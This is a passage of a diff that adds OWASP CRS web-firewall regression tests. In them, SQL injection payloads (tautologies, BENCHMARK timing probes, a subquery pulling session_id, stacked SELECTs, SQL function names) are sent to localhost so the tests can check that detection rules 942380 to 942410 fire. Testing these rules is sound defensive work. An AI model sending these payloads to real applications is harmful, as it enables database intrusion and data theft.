output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + 
log_contains: id "942380"
+ - test_title: 942380-44
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
+ - test_title: 942380-45
+ desc: "SQL Injection Attack: EXISTS"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
new file mode 100644
index 00000000..14fbd480
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942390.yaml
+tests:
+ - test_title: 942390-1
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?var=sdfsd%27or%201%20%3e%201"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942390"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
new file mode 100644
index 00000000..f27782cb
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
@@ -0,0 +1,41 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942400.yaml
+tests:
+ - test_title: 942400-1
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # variable name boundary attacks
+ data: "and '5'orig_var_datavarname=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942400"
+ - test_title: 942400-2
+ desc: "SQL Injection Attack - false positive"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # variable name boundary attacks
+ data: "and 7 oranges"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942400"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
new file mode 100644
index 00000000..088603c0
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
@@ -0,0 +1,2013 @@
+---
+meta:
+ author: "Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942410.yaml
+tests:
+ - test_title: 942410-1
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "ABS("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-2
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "benchmark("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-3
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "BENChmARk("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-4
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "cast("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-5
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "CAST("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-6
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "char("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-7
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "chaR("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-8
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "chr("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-9
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "CHR("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-10
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "COALESCE("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-11
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "Compress ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-12
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "concat ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-13
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "cOnCaT("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-14
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "concat_ws("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-15
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "convert("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-16
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "cOnVeRt("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-17
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "COS("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-18
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "COUNT("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-19
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "CURRENT_USER("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-20
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "database ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-21
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "date("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-22
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=date%5D%3D%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-23
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=day.+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-24
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=day%26%27%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-25
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: 
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=EXTRACTVALUE%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-31
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=floor%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-32
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=FLOOR+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-33
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=format%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-34
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=GROUP_CONCAT%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-35
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ 
input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=hex%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-36
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=hEx%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-37
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=if+%21%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-38
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=if+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-39
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=if%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-40
+ desc: "SQL Injection Attack"
+ stages: 
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=if%5C%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-41
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=IFNULL%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-42
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=in+%27%24%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-43
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=IN+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-44
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=IN%2F%2A%2A%2F%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-45
+ desc: 
"SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + 
log_contains: id "942410"
+ - test_title: 942410-50
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=length%3F%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-51
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=length%26%26%21%21%21%24%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-52
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=length%26%26%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-53
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
